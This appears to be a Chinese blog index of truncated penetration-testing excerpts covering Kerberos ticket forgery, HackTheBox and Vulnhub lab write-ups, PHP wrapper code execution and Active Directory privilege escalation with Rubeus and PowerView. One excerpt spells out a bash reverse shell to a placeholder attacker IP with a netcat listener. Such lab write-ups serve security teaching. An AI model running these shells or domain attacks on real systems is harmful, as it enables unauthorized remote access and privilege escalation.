回想一下 Kerberos 协议是如何工作的。我们知道，当用户想要访问由服务主体名称 (SPN)托管的资源时，客户端会请求由域控制器生成的服务票证。然后，服务票证由应用程序服务器解密和验证，因为它...

1. python方式建立交互式shell攻击者先监听nc -lvnp 监听端口 受害者bash -c 'bash -i >& /dev/tcp/攻击者ip/攻击者端口 0>&1'再攻击者端就能得到shell 如果有python 可以使用...

1. 实验环境由于没有找到合适的虚拟FW 故用ikuai路由器代替防火墙现在内网只允许80和443端口的流量出当前设置ACL我们希望内网Win7能访问到外网CentOS的Web服务器 端口为8000 2. 实验步骤1. 我...

虽然 php://filter 包装器可用于包含文件的内容，但我们可以使用 data:// 包装器来实现代码执行。此包装器用于将数据元素作为纯文本或 Base64 编码数据嵌入到正在运行的 Web 应用程序的代码中。...

实验环境攻击者 Kali 192.168.192.128受害者 Goldeneye1.1 IP未知攻击者和受害者在同一网段 1. 信息收集nmap -sn 192.168.192.0/24受害者IP为192.168.192.164收集受害者服务详情nmap -sV -A 19...

简介IrkedDifficulty Easy 实验环境攻击者 Kali 10.10.16.16受害者 IP 10.10.10.117  Linux 1. 信息收集收集受害者服务详情nmap -T5 -n -vvv -oA Irked -noscript 10.10.10.117806697/tcp op...

任务• 使用 DA 访问 dollarcorp.moneycorp.local，使用域信任密钥将权限升级到企业管理员或 DA 到父域 moneycorp.local。 使用DA权限启动一个进程C:\AD\Tools\Rubeus.exe asktgt /user:svcadm...

在对 Active Directory 身份验证执行攻击3中，我们获取并破解了 TGS-REP 哈希以检索 SPN 的明文密码。我们将更进一步，伪造我们自己的服务票证。 Kerberos 身份验证的内部工作原理，在服务帐户...

我 们 将 使 用 PowerView 的 Find-DomainShare 功 能 来 查 找 域 中 的 共 享 。 我 们 还 可 以 添 加 -CheckShareAccess 标志来显示仅供我们使用的共享。但是，我们现在将跳过此标志以返回...

实验环境攻击者 Kali 192.168.0.103受害者 DC-8 IP未知攻击者和受害者在同一网段 1. 信息收集nmap -sn 192.168.0.0/24受害者IP为192.168.0.101 收集受害者服务详情nmap -sV -A 192.168.0.1012...